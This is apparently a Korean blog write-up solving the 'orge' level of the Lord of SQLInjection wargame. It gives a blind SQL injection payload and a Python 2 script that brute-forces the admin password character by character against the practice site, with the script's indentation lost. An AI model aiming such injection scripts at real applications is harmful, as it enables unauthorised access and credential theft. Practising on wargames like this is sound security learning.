pw 길이 : %27||ascii(id)-103%26%26length(pw)=8%23
tip : &는 get으로 보낼때 urlencoding을 하지 않으면 파라미터 연산자인줄 알고 &뒤에 온 값을 파라미터값으로 인식한다.
import urllib, urllib2
url = "http://los.eagle-jump.org/orge_40d2b61f694f72448be9c97d1cea2480.php?pw="
result = ""
for i in range(1, 9):
for j in range(33,127):
payload = "%27||ascii(id)-103%26%26if(ascii(substr(pw,{},1))={},1,1=2)%23".format(i, j)
testurl = url + payload
print testurl
req = urllib2.Request(testurl)
req.add_header('User-Agent', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11')
req.add_header('Cookie','__cfduid=d4cc8c809fb82627de6749e5eaac73e1f1500957474; PHPSESSID=498v4fb9opfr78vauqu83eq635')
res = urllib2.urlopen(req).read()
if "Hello admin" in res:
print "[*]Find!"
result += chr(j)
break
print "[+]FIND FLAG! : {}".format(result)
'Wargame > lord of sqlinjection' 카테고리의 다른 글
| Lord of SQLinjection vampire (0) | 2017.07.25 |
|---|---|
| Lord of SQLinjection Troll (0) | 2017.07.25 |
| Lord of SQLinjection Darkelf (0) | 2017.07.25 |
| Lord of SQLinejction wolfman (0) | 2017.07.25 |
| Lord of SQLinjection orc (0) | 2017.07.25 |